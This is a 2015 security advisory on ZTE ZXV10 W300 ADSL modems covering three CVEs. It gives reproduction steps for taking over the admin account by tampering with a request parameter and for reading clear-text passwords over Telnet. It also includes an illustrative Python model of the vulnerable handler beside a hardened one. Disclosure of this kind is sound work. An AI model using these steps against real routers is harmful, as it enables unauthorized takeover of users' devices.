Wednesday, November 18, 2015

ZTE ADSL ZXV10 W300 Modems - Multiple vulnerabilities

Confirmed on two (of multiple) software versions: W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57

CVE-ID
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259

Note: large deployment size, primarily in Peru; used by TdP (Telefonica del Peru).

Insufficient authorization controls
CVE-ID: CVE-2015-7257
Observed in the Password Change functionality. Other functions may be vulnerable as well.
Expected behavior:
Only the administrative 'admin' user should be able to change the password of any device user. 'support' is a diagnostic user with restricted privileges; it can change only its own password.
Vulnerability:
Any non-admin user can change the 'admin' password.

Steps to reproduce:
a. Log in as user 'support' (password XXX)
b. Access the Password Change page - http://<IP>/password.htm
c. Submit the request
d. Intercept and tamper with the parameter 'username': change it from 'support' to 'admin'
e. Enter the new password -> the old password is not requested -> Submit
-> Log in as admin
-> Pwn!
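To show the server-side root cause of CVE-2015-7257, here is an added example (not firmware code from ZTE or from this post) that models the password-change handler as the steps above describe it, next to a hardened version of the same check. User records, priorities and function names are constructed assumptions.

```python
# Added example: model of the ZXV10 W300 password-change flaw (CVE-2015-7257)
# and a hardened handler. Data below is constructed, not taken from a device.
import hmac

ADMIN_PRIORITY = 2  # assumption: higher priority = more privileged, as in 'login show'

# constructed sample accounts: username -> [password, priority]
USERS = {
    "admin":   ["password1", 2],
    "support": ["password2", 0],
}

def vulnerable_change_password(session_user, form):
    """Models the observed behaviour: the account to modify is taken from the
    client-supplied 'username' field and no old password is requested, so a
    'support' session can rewrite the 'admin' password by editing one field."""
    target = form["username"]          # attacker-controlled, never checked
    USERS[target][0] = form["new_password"]
    return True

def hardened_change_password(session_user, form):
    """Hardened handler: the target defaults to the authenticated session user;
    changing another account requires admin priority, and changing your own
    account requires the current password."""
    caller_priority = USERS[session_user][1]
    target = form.get("username", session_user)
    if target not in USERS:
        return False
    if target == session_user:
        # self-service change: prove knowledge of the current password
        supplied = form.get("old_password", "")
        if not hmac.compare_digest(USERS[target][0], supplied):
            return False
    elif caller_priority < ADMIN_PRIORITY:
        # only the administrative user may change another user's password
        return False
    USERS[target][0] = form["new_password"]
    return True

if __name__ == "__main__":
    tampered = {"username": "admin", "new_password": "changed"}
    print("hardened, support -> admin:", hardened_change_password("support", tampered))  # False
    print("vulnerable, support -> admin:", vulnerable_change_password("support", tampered))  # True
```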


Sensitive information disclosure - clear-text passwords
Displaying user information over a Telnet connection shows all valid users and their passwords in clear text.
CVE-ID: CVE-2015-7258
Steps to reproduce:
$ telnet <IP>
Trying <IP>... 
Connected to <IP>. 
Escape character is '^]'.
User Access Verification 
Username: admin 
Password: <--- admin/XXX1
$sh
ADSL#login show                 <--- shows user information
Username     Password  Priority
admin        password1 2
support      password2 0
admin        password3 1

(Potential) Backdoor account feature - insecure account management
The same login account can exist on the device multiple times, each with a different priority number. It is possible to log in to the device with any of the username/password combinations.
CVE-ID: CVE-2015-7259
It is considered a (redundant) login support feature.

Steps to reproduce:
$ telnet <IP>
Trying <IP>... 
Connected to <IP>. 
Escape character is '^]'.
User Access Verification
Username: admin
Password: <--- admin/password3
$sh
ADSL#login show
Username  Password  Priority 
admin  password1  2
support  password2  0
admin  password3  1
